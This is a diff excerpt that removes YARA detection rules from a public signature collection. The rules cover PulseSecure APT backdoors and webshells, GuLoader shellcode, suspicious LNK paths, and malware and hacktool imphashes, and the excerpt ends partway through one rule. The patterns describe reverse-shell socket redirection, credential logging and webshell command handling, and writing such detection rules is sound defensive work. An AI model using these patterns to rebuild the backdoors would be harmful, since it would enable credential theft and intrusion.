-		$s4 = /\}[\x09\x20]{0,32}elsif[\x09\x20]{0,32}\([\x09\x20]{0,32}\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27](Radius|Samba|AD)[\x22\x27][\x09\x20]{0,32}\)\s{0,128}\{\s{0,128}@\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}&/
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_FE_APT_Trojan_PL_QUIETPULSE
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "4c49eef7-b8fa-55d5-8fb8-8964f6f50003"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L154-L172"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "00575bec8d74e221ff6248228c509a16"
-		logic_hash = "226a56369e141834d4834400bbf1a006bbb6e9b39e16e24b0106bff1a9c202a9"
-		score = 75
-		quality = 58
-		tags = ""
-
-	strings:
-		$s1 = /open[\x09\x20]{0,32}\(\*STDOUT[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>&CLIENT[\x22\x27]\)/
-		$s2 = /open[\x09\x20]{0,32}\(\*STDERR[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>&CLIENT[\x22\x27]\)/
-		$s3 = /socket[\x09\x20]{0,32}\(SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}PF_UNIX[\x09\x20]{0,32},[\x09\x20]{0,32}SOCK_STREAM[\x09\x20]{0,32},[\x09\x20]{0,32}0[\x09\x20]{0,32}\)[\x09\x20]{0,32};\s{0,128}unlink/
-		$s4 = /bind[\x09\x20]{0,32}\([\x09\x20]{0,32}SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}sockaddr_un\(/
-		$s5 = /listen[\x09\x20]{0,32}\([\x09\x20]{0,32}SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}SOMAXCONN[\x09\x20]{0,32}\)[\x09\x20]{0,32};/
-		$s6 = /my[\x09\x20]{1,32}\$\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}fork\([\x09\x20]{0,32}\)[\x09\x20]{0,32};\s{1,128}if[\x09\x20]{0,32}\([\x09\x20]{0,32}\$\w{1,64}[\x09\x20]{0,32}==[\x09\x20]{0,32}0[\x09\x20]{0,32}\)[\x09\x20]{0,32}\{\s{1,128}exec\(/
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_1
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "1fab6d2f-96e8-5def-a93e-2bddd04e7ec8"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L173-L190"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b"
-		logic_hash = "d65a466cc15214d8e26597588c039a6b9fb4637ef8f3b1ebea27f016fbd5cba8"
-		score = 75
-		quality = 83
-		tags = ""
-
-	strings:
-		$s1 = "->getRealmInfo()->{name}"
-		$s2 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>/
-		$s3 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]realm=\$/
-		$s4 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]username=\$/
-		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]password=\$/
-
-	condition:
-		(@s1 [ 1 ] < @s2 [ 1 ] ) and ( @s2 [ 1 ] < @s3 [ 1 ] ) and $s4 and $s5
-}
-rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_2
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "dc941935-aec7-54b6-a278-f1453b9785df"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L191-L208"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4a2a7cbc1c8855199a27a7a7b51d0117"
-		logic_hash = "4ade993176c918ec23e99fc585e9ab14d9f9e93a7eca00f2c3b0ebbd13d6ec5b"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$s1 = "open(*fd,"
-		$s2 = "syswrite(*fd,"
-		$s3 = "close(*fd);"
-		$s4 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>\/tmp\/[\w.]{1,128}[\x22\x27]\);[\x09\x20]{0,32}syswrite\(\*fd,[\x09\x20]{0,32}/
-		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27][\w]{1,128}=\$\w{1,128} ?[\x22\x27],[\x09\x20]{0,32}5000\)/
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_3
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "8a597521-c873-5bcc-85e6-5a0a061fffb7"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L209-L226"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4a2a7cbc1c8855199a27a7a7b51d0117"
-		logic_hash = "025308591e058de284f949fd4f788e4a4f46bb2f6c0e1161237f1f811d8179ba"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$s1 = "open(*fd,"
-		$s2 = "syswrite(*fd,"
-		$s3 = "close(*fd);"
-		$s4 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>\/tmp\/dsstartssh\.statementcounters[\x22\x27]\);[\x09\x20]{0,32}syswrite\(\*fd,[\x09\x20]{0,32}/
-		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27][\w]{1,128}=\$username ?[\x22\x27],[\x09\x20]{0,32}\d{4}\)/
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_FE_APT_Backdoor_Linux32_SLOWPULSE_1 : FILE
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "dd35257f-5b6f-55a6-a709-873ded1f4b72"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L227-L244"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68"
-		logic_hash = "c1d92ea4ed8e5934c8356e1e52092935c53a138e454026737448f7f523ea06be"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$sb1 = {FC b9 [4] e8 00 00 00 00 5? 8d b? [4] 8b}
-		$sb2 = {f3 a6 0f 85 [4] b8 03 00 00 00 5? 5? 5?}
-		$sb3 = {9c 60 e8 00 00 00 00 5? 8d [5] 85 ?? 0f 8?}
-		$sb4 = {89 13 8b 51 04 89 53 04 8b 51 08 89 53 08}
-		$sb5 = {8d [5] b9 [4] f3 a6 0f 8?}
-
-	condition:
-		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and all of them
-}
-rule SIGNATURE_BASE_FE_APT_Webshell_PL_STEADYPULSE_1
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "49457fbb-9288-565f-909d-e8228c21c1e4"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L265-L284"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "168976797d5af7071df257e91fcc31ce1d6e59c72ca9e2f50c8b5b3177ad83cc"
-		logic_hash = "a0e3ebdd02ccf5cc8fc0a83c1d0224aed45dc5094eb85bd855e5b74b34e3aaaf"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$s1 = "parse_parameters"
-		$s2 = "s/\\+/ /g"
-		$s3 = "s/%(..)/pack("
-		$s4 = "MIME::Base64::encode($"
-		$s5 = "$|=1;"
-		$s6 = "RC4("
-		$s7 = "$FORM{'cmd'}"
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_MAL_Crime_Win32_Loader_Guloader_1_Experimental : FILE
-{
-	meta:
-		description = "Detects injected GuLoader shellcode bin"
-		author = "@VK_Intel"
-		id = "c37882c6-15dc-54dc-8c10-7e91ea0fc6bd"
-		date = "2020-05-04"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1257206565146370050"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_guloader.yar#L2-L15"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "03b7e0251b1c08798ce310cc4c11adfaa3071409d608c91c30d5fc7e28a079de"
-		score = 50
-		quality = 85
-		tags = "FILE"
-		tlp = "white"
-
-	strings:
-		$djib2_hash = { f8 8b ?? ?? ?? ba 05 15 00 00 89 d3 39 c0 c1 e2 05 81 ff f6 62 f1 87 01 da 0f ?? ?? d9 d0 01 da 83 c6 02 66 ?? ?? ?? 75 ?? c2 04 00}
-		$nt_inject_loader = {8b ?? ?? ba 44 1a 0e 9e 39 d2 e8 ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? f8 ba d0 e0 8b 30 e8 ?? ?? ?? ?? d9 d0 89 ?? ?? d9 d0 81 fb 20 af 00 00 8b ?? ?? 39 c9 ba 92 a7 f3 95 e8 ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? 39 d2 ba d0 20 2e d0 e8 ?? ?? ?? ?? 89 ?? ?? f8 8b ?? ?? ba 6a 19 1f 23 d9 d0 e8 ?? ?? ?? ?? d9 d0 89 ?? ?? 81 fb e4 8c 00 00 39 c9 8b ?? ?? ba 19 50 9c c2 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 39 d2 8b ?? ?? fc ba 3d 13 8e 8b e8 ?? ?? ?? ?? d9 d0 89 ?? ?? f8 8b ?? ?? ba 30 3d 7b 2c e8 ?? ?? ?? ??}
-
-	condition:
-		uint16( 0 ) == 0x5a4d and all of them
-}
-rule SIGNATURE_BASE_SUSP_LNK_Suspicious_Folders_Jan25 : FILE
-{
-	meta:
-		description = "Detects link files (.LNK) with suspicious folders mentioned in the target path"
-		author = "Florian Roth"
-		id = "5f1bcd18-abec-5831-b24f-519c92a2454e"
-		date = "2025-01-24"
-		modified = "2025-03-20"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mixed_open_source_export.yar#L2-L16"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "776adb706e165389d0abdf8d6f719f6db1ec6d2f3d9d96e1c4a5f2b55e482c31"
-		score = 65
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$x1 = "RECYCLER.BIN\\" wide
-		$x2 = "Perflogs\\" wide
-
-	condition:
-		uint16( 0 ) == 0x004c and 1 of them
-}
-
-rule SIGNATURE_BASE_MAL_Malware_Imphash_Mar23_1 : HIGHVOL FILE
-{
-	meta:
-		description = "Detects malware by known bad imphash or rich_pe_header_hash"
-		author = "Arnim Rupp"
-		id = "fb398c26-e9ac-55f9-b605-6b763021e96a"
-		date = "2023-03-20"
-		modified = "2023-03-22"
-		reference = "https://yaraify.abuse.ch/statistics/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_imphash_detection.yar#L4-L90"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "167dde6bd578cbfcc587d5853e7fc2904cda10e737ca74b31df52ba24db6e7bc"
-		hash = "0a25a78c6b9df52e55455f5d52bcb3816460001cae3307b05e76ac70193b0636"
-		hash = "d87a35decd0b81382e0c98f83c7f4bf25a2b25baac90c9dcff5b5a147e33bcc8"
-		hash = "5783bf969c36f13f4365f4cae3ec4ee5d95694ff181aba74a33f4959f1f19e8b"
-		hash = "4ca925b0feec851d787e7ee42d263f4c08b0f73f496049bdb5d967728ff91073"
-		hash = "9c2d2fa9c32fdff1828854e8cc39160dae73a4f90fb89b82ef6d853b63035663"
-		hash = "2c53d58f30b2ee1a2a7746e20f136c34d25d0214261783fc67e119329d457c2a"
-		hash = "5e83747015b0589b4f04b0db981794adf53274076c1b4acf717e3ff45eca0249"
-		hash = "ceaa0af90222ff3a899b9a360f6328cbda9ec0f5fbd18eb44bdc440470bb0247"
-		hash = "82fb1ba998dfee806a513f125bb64c316989c36c805575914186a6b45da3b132"
-		hash = "cb41d2520995abd9ba8ccd42e53d496a66da392007ea6aebd4cbc43f71ad461a"
-		hash = "c7bd758506b72ee6db1cc2557baf745bf9e402127d8e49266cc91c90f3cf3ed5"
-		hash = "e6e0d60f65a4ea6895ff97df340f6d90942bbfa402c01bf443ff5b4641ff849f"
-		hash = "e8ddef9fa689e98ba2d48260aea3eb8fa41922ed718b7b9135df6426b3ddf126"
-		hash = "ad57d77aba6f1bf82e0affe4c0ae95964be45fb3b7c2d6a0e08728e425ecd301"
-		hash = "483df98eb489899bc89c6a0662ca8166c9b77af2f6bedebd17e61a69211843d9"
-		hash = "a65ed85851d8751e6fe6a27ece7b3879b90866a10f272d8af46fb394b46b90a9"
-		hash = "09081e04f3228d6ef2efc1108850958ed86026e4dfda199852046481f4711565"
-		hash = "1b2c9054f44f7d08cffe7e2d9127dbd96206ab2c15b63ebf6120184950336ae1"
-		hash = "257887d1c84eb15abb2c3c0d7eb9b753ca961d905f4979a10a094d0737d97138"
-		hash = "1cbad8b58dbd1176e492e11f16954c3c254b5169dde52b5ad6d0d3c51930abf8"
-		hash = "a9897fd2d5401071a8219b05a3e9b74b64ad67ab75044b3e41818e6305a8d7b9"
-		hash = "aeac45fbc5d2a59c9669b9664400aeaf6699d76a57126d2f437833a3437a693e"
-		hash = "7b4c4d4676fab6c009a40d370e6cb53ea4fd73b09c23426fbaccc66d652f2a00"
-		hash = "b07f6873726276842686a6a6845b361068c3f5ce086811db05c1dc2250009cd0"
-		hash = "d1b3afebcacf9dd87034f83d209b42b0d79e66e08c0a897942fbe5fbd6704a0e"
-		hash = "074d52be060751cf213f6d0ead8e9ab1e63f055ae79b5fcbe4dd18469deea12b"
-		hash = "84d1fdef484fa9f637ae3d6820c996f6c5cf455470e8717ad348a3d80d2fb8e0"
-		hash = "437da123e80cfd10be5f08123cd63cfc0dc561e17b0bef861634d60c8a134eda"
-		hash = "f76c36eb22777473b88c6a5fc150fd9d6b5fac5b2db093f0ccd101614c46c7e7"
-		hash = "5498b7995669877a410e1c2b68575ca94e79014075ef5f89f0f1840c70ebf942"
-		hash = "af4e633acfba903e7c92342b114c4af4e694c5cfaea3d9ea468a4d322b60aa85"
-		hash = "d7d870f5afab8d4afa083ea7d7ce6407f88b0f08ca166df1a1d9bdc1a46a41b3"
-		hash = "974209d88747fbba77069bb9afa9e8c09ee37ae233d94c82999d88dfcd297117"
-		hash = "f2d99e7d3c59adf52afe0302b298c7d8ea023e9338c2870f74f11eaa0a332fc4"
-		hash = "b32c93be9320146fc614fafd5e6f1bb8468be83628118a67eb01c878f941ee5d"
-		hash = "bbd99acc750e6457e89acbc5da8b2a63b4ef01d4597d160e9cde5dc8bd04cf74"
-		hash = "dbff5ca3d1e18902317ab9c50be4e172640a8141e09ec13dcca986f2ec1dc395"
-		hash = "3ee1741a649f0b97bbeb05b6f9df97afda22c82e1e870177d8bdd34141ef163c"
-		hash = "222096fc800c8ea2b0e530302306898b691858324dbe5b8357f90407e9665b85"
-		hash = "b9995d1987c4e8b6fb30d255948322cfad9cc212c7f8f4c5db3ac80e23071533"
-		hash = "a6a92ea0f27da1e678c15beb263647de43f68608afe82d6847450f16a11fe6c0"
-		hash = "866e3ea86671a62b677214f07890ddf7e8153bec56455ad083c800e6ab51be37"
-		logic_hash = "dcb4d9a1ca83bbd26178895f20f9ab443f48f42aa3ad3df042c763c24ce8c047"
-		score = 75
-		quality = 85
-		tags = "HIGHVOL, FILE"
-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
-
-	strings:
-		$fp1 = "Win32 Cabinet Self-Extractor" wide
-		$fp2 = "EXTRACTOPT" ascii fullword
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "9ee34731129f4801db97fd66adbfeaa0" or pe.imphash ( ) == "f9e8597c55008e10a8cdc8a0764d5341" or pe.imphash ( ) == "0a76016a514d8ed3124268734a31e2d2" or pe.imphash ( ) == "d3cbd6e8f81da85f6bf0529e69de9251" or pe.imphash ( ) == "d8b32e731e5438c6329455786e51ab4b" or pe.imphash ( ) == "cdf5bbb8693f29ef22aef04d2a161dd7" or pe.imphash ( ) == "890e522b31701e079a367b89393329e6" or pe.imphash ( ) == "bf5a4aa99e5b160f8521cadd6bfe73b8" or pe.imphash ( ) == "646167cce332c1c252cdcb1839e0cf48" or pe.imphash ( ) == "9f4693fc0c511135129493f2161d1e86" or pe.imphash ( ) == "b4c6fff030479aa3b12625be67bf4914" ) and not 1 of ( $fp* )
-}
-
-rule SIGNATURE_BASE_HKTL_Imphashes_Aug22_1 : FILE
-{
-	meta:
-		description = "Detects different hacktools based on their imphash"
-		author = "Florian Roth"
-		id = "e1d4dde6-16ad-5495-b3a7-01a86c830761"
-		date = "2022-08-17"
-		modified = "2023-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_imphash_detection.yar#L93-L192"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e76701b889138f9635cfe3a2f08710db3a6f0a3c3a15faa705ff0904d0566a1f"
-		score = 80
-		quality = 85
-		tags = "FILE"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.imphash ( ) == "bcca3c247b619dcd13c8cdff5f123932" or pe.imphash ( ) == "3a19059bd7688cb88e70005f18efc439" or pe.imphash ( ) == "bf6223a49e45d99094406777eb6004ba" or pe.imphash ( ) == "0c106686a31bfe2ba931ae1cf6e9dbc6" or pe.imphash ( ) == "0d1447d4b3259b3c2a1d4cfb7ece13c3" or pe.imphash ( ) == "1b0369a1e06271833f78ffa70ffb4eaf" or pe.imphash ( ) == "4c1b52a19748428e51b14c278d0f58e3" or pe.imphash ( ) == "4d927a711f77d62cebd4f322cb57ec6f" or pe.imphash ( ) == "66ee036df5fc1004d9ed5e9a94a1086a" or pe.imphash ( ) == "672b13f4a0b6f27d29065123fe882dfc" or pe.imphash ( ) == "6bbd59cea665c4afcc2814c1327ec91f" or pe.imphash ( ) == "725bb81dc24214f6ecacc0cfb36ad30d" or pe.imphash ( ) == "9528a0e91e28fbb88ad433feabca2456" or pe.imphash ( ) == "9da6d5d77be11712527dcab86df449a3" or pe.imphash ( ) == "a6e01bc1ab89f8d91d9eab72032aae88" or pe.imphash ( ) == "b24c5eddaea4fe50c6a96a2a133521e4" or pe.imphash ( ) == "d21bbc50dcc169d7b4d0f01962793154" or pe.imphash ( ) == "fcc251cceae90d22c392215cc9a2d5d6" or pe.imphash ( ) == "23867a89c2b8fc733be6cf5ef902f2d1" or pe.imphash ( ) == "a37ff327f8d48e8a4d2f757e1b6e70bc" or pe.imphash ( ) == "f9a28c458284584a93b14216308d31bd" or pe.imphash ( ) == "6118619783fc175bc7ebecff0769b46e" or pe.imphash ( ) == "959a83047e80ab68b368fdb3f4c6e4ea" or pe.imphash ( ) == "563233bfa169acc7892451f71ad5850a" or pe.imphash ( ) == "87575cb7a0e0700eb37f2e3668671a08" or pe.imphash ( ) == "13f08707f759af6003837a150a371ba1" or pe.imphash ( ) == "1781f06048a7e58b323f0b9259be798b" or pe.imphash ( ) == "233f85f2d4bc9d6521a6caae11a1e7f5" or pe.imphash ( ) == "24af2584cbf4d60bbe5c6d1b31b3be6d" or pe.imphash ( ) == "632969ddf6dbf4e0f53424b75e4b91f2" or pe.imphash ( ) == "713c29b396b907ed71a72482759ed757" or pe.imphash ( ) == "749a7bb1f0b4c4455949c0b2bf7f9e9f" or pe.imphash ( ) == "8628b2608957a6b0c6330ac3de28ce2e" or pe.imphash ( ) == "8b114550386e31895dfab371e741123d" or pe.imphash ( ) == "94cb940a1a6b65bed4d5a8f849ce9793" or pe.imphash ( ) == "9d68781980370e00e0bd939ee5e6c141" or pe.imphash ( ) == "b18a1401ff8f444056d29450fbc0a6ce" or pe.imphash ( ) == "cb567f9498452721d77a451374955f5f" or pe.imphash ( ) == "730073214094cd328547bf1f72289752" or pe.imphash ( ) == "17b461a082950fc6332228572138b80c" or pe.imphash ( ) == "dc25ee78e2ef4d36faa0badf1e7461c9" or pe.imphash ( ) == "819b19d53ca6736448f9325a85736792" or pe.imphash ( ) == "829da329ce140d873b4a8bde2cbfaa7e" or pe.imphash ( ) == "c547f2e66061a8dffb6f5a3ff63c0a74" or pe.imphash ( ) == "0588081ab0e63ba785938467e1b10cca" or pe.imphash ( ) == "0d9ec08bac6c07d9987dfd0f1506587c" or pe.imphash ( ) == "bc129092b71c89b4d4c8cdf8ea590b29" or pe.imphash ( ) == "4da924cf622d039d58bce71cdf05d242" or pe.imphash ( ) == "e7a3a5c377e2d29324093377d7db1c66" or pe.imphash ( ) == "9a9dbec5c62f0380b4fa5fd31deffedf" or pe.imphash ( ) == "af8a3976ad71e5d5fdfb67ddb8dadfce" or pe.imphash ( ) == "0c477898bbf137bbd6f2a54e3b805ff4" or pe.imphash ( ) == "0ca9f02b537bcea20d4ea5eb1a9fe338" or pe.imphash ( ) == "3ab3655e5a14d4eefc547f4781bf7f9e" or pe.imphash ( ) == "e6f9d5152da699934b30daab206471f6" or pe.imphash ( ) == "3ad59991ccf1d67339b319b15a41b35d" or pe.imphash ( ) == "ffdd59e0318b85a3e480874d9796d872" or pe.imphash ( ) == "0cf479628d7cc1ea25ec7998a92f5051" or pe.imphash ( ) == "07a2d4dcbd6cb2c6a45e6b101f0b6d51" or pe.imphash ( ) == "d6d0f80386e1380d05cb78e871bc72b1" or pe.imphash ( ) == "38d9e015591bbfd4929e0d0f47fa0055" or pe.imphash ( ) == "0e2216679ca6e1094d63322e3412d650" or pe.imphash ( ) == "ada161bf41b8e5e9132858cb54cab5fb" or pe.imphash ( ) == "2a1bc4913cd5ecb0434df07cb675b798" or pe.imphash ( ) == "11083e75553baae21dc89ce8f9a195e4" or pe.imphash ( ) == "a23d29c9e566f2fa8ffbb79267f5df80" or pe.imphash ( ) == "4a07f944a83e8a7c2525efa35dd30e2f" or pe.imphash ( ) == "767637c23bb42cd5d7397cf58b0be688" or pe.imphash ( ) == "14c4e4c72ba075e9069ee67f39188ad8" or pe.imphash ( ) == "3c782813d4afce07bbfc5a9772acdbdc" or pe.imphash ( ) == "7d010c6bb6a3726f327f7e239166d127" or pe.imphash ( ) == "89159ba4dd04e4ce5559f132a9964eb3" or pe.imphash ( ) == "6f33f4a5fc42b8cec7314947bd13f30f" or pe.imphash ( ) == "5834ed4291bdeb928270428ebbaf7604" or pe.imphash ( ) == "5a8a8a43f25485e7ee1b201edcbc7a38" or pe.imphash ( ) == "dc7d30b90b2d8abf664fbed2b1b59894" or pe.imphash ( ) == "41923ea1f824fe63ea5beb84db7a3e74" or pe.imphash ( ) == "3de09703c8e79ed2ca3f01074719906b" or pe.imphash ( ) == "a53a02b997935fd8eedcb5f7abab9b9f" or pe.imphash ( ) == "e96a73c7bf33a464c510ede582318bf2" or pe.imphash ( ) == "32089b8851bbf8bc2d014e9f37288c83" or pe.imphash ( ) == "09D278F9DE118EF09163C6140255C690" or pe.imphash ( ) == "03866661686829d806989e2fc5a72606" or pe.imphash ( ) == "e57401fbdadcd4571ff385ab82bd5d6d" or pe.imphash ( ) == "84B763C45C0E4A3E7CA5548C710DB4EE" or pe.imphash ( ) == "19584675d94829987952432e018d5056" or pe.imphash ( ) == "330768a4f172e10acb6287b87289d83b" )
-}
-
-rule SIGNATURE_BASE_SUSP_Imphash_Mar23_2 : HIGHVOL FILE
-{
-	meta:
-		description = "Detects imphash often found in malware samples (Zero hits with with search for 'imphash:x p:0' on Virustotal)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b739d540-5d9f-53b3-9e42-a514dc972e8d"
-		date = "2023-03-23"
-		modified = "2023-11-25"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_imphash_detection.yar#L194-L295"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4"
-		hash = "14ec56489fbcc3c7f1ef9a4d4a80ff302a5e233cdc4429a29c635a88fb1278d6"
-		hash = "13731912823d6ce01c28a8d7d7f961505f461620bb35adbb409d4954ba1f4b8e"
-		hash = "15e59cc5d7b83e63d40dbfd8406701cb4decd31353f68fda47238d073c87e4ea"
-		hash = "13e5bb40be20b1a0bc28081ce7798f339c28c9652cb37b538c29872dfd0cd51d"
-		hash = "16f963afdb30b38ba4b8b98ce56a37626e9fd87de9eba5f9903d2ba7f8a77788"
-		hash = "168f22d02304ce66be88d2370c8fa7c7d9aa2ccf80f8e376edfeabfc9b96c73d"
-		hash = "9e7701450dbcbd35083e34df935bd77a95735c4b441e0fc8eacd543a621f2fa5"
-		hash = "51205c100702b21cce600692d69f3b108f49228e53f36678dd8b39434406526b"
-		hash = "c9b48e8b0e7c6fa75886554659bc0529e454d84b29daa07bd4323aca9a33f607"
-		hash = "ba5c06703bd3c093afa89e45d86aaf6c151fbaef44ebf3b65c97f3b376a88c72"
-		hash = "7281afc138e8e898aee16d415cd02a29dc5dedda5b11c23934aac0ebd208373b"
-		hash = "10a091b2468a8286f7b1a580d8923aef48856b43014e849035f05c4dbdc0a413"
-		hash = "56c04e76427bd982be83799d0a435732193d7bf5a70cdeba5eb63eaf0d4ebb77"
-		hash = "0aa8b7eddc4792a82f247702442c04e50173bd7712a4b596545916480942853b"
-		hash = "627f043ad875c182682149653363b7f856dd618d169821b18df7bc9cdf6269d8"
-		hash = "e1df460fd99c4f901859f3a8ec23b041ba9f4b79897dec349a96d6a27fb3e335"
-		hash = "f10ecbd8031ce85b782c59682ff32301a65e0975687977688771f1057fb063d1"
-		hash = "1bc7b8932b5b077b359c79e7ca664938b7a487a4e7e6b99d6647d6803bc677c5"
-		hash = "01f81029a5e93cbfecfbc81cbd4a2ffd1bb1b6159e2a144a21e58caf8dab9661"
-		hash = "cd33a71f71e2971667bacb0da71f2d36073777993b9581ec90bbf042162c3530"
-		hash = "4aab991149cb2dc8c0c0a323af3acbbd73d6a22177910ef3af92b05ae7c9ae7b"
-		hash = "df05fa3983c9e623388231d366dba4e435575ca53421d3f0bcb0fb346dd971d4"
-		hash = "14de3584fe7108386f7637c2bd343f30341c0fa2102d52bb35ee772b5b7672f0"
-		hash = "c4d9ad5cffd9aa13dfe3acbf0905810e28ff96d231541d7e209327ca5b0b24fe"
-		hash = "5e0bed2269dc34c6cc2db30b0a53282e6debb85b3c90a857d1be4cfd06312211"
-		hash = "3aa13e72382a2d7da592273b8c18a42106b65db528e16b6066646812e81555c4"
-		hash = "244c4a930e3644ffb96bf3ab33e8c8c0f94ed9fe6a8b2fc45fc8e9b6471ef3a8"
-		hash = "f00848b8edeeb5a668bf7e89e3f33f438b2f5d5cf130596a8ed2531e21be6d81"
-		hash = "5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e"
-		logic_hash = "c6482cbc01a880ffd3056d28a2fde8f87402b1f85d36075c1f0b50788d469ca3"
-		score = 65
-		quality = 85
-		tags = "HIGHVOL, FILE"
